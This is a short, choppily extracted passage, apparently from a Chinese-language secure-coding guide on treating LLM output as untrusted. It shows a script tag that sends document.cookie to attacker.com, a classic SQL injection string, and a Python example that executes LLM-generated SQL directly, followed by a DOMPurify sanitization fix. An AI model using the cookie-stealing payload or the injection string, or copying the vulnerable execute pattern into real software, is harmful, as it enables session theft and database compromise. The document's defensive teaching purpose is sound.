<script>fetch('[https://attacker.com/steal?cookie=] (https://attacker.com/steal?cookie=)' + document.cookie)</script>
dangerouslySetInnerHTML 或未轉義的方式渲染 LLM 產生的 Markdown/HTML。'admin' or '1'='1'的帳號Python
# 錯誤:直接將 LLM 生成的 SQL 傳給資料庫執行
llm_sql_query = llm.generate("Convert to SQL: " + user_input)
cursor.execute(llm_sql_query) # 引發 SQL Injection
JavaScript
import DOMPurify from 'dompurify';
import { marked } from 'marked';
// 1. 解析 Markdown 2. 使用 DOMPurify 過濾惡意標籤
const rawHtml = marked.parse(llmOutput);
const cleanHtml = DOMPurify.sanitize(rawHtml);
document.getElementById('content').innerHTML = cleanHtml;
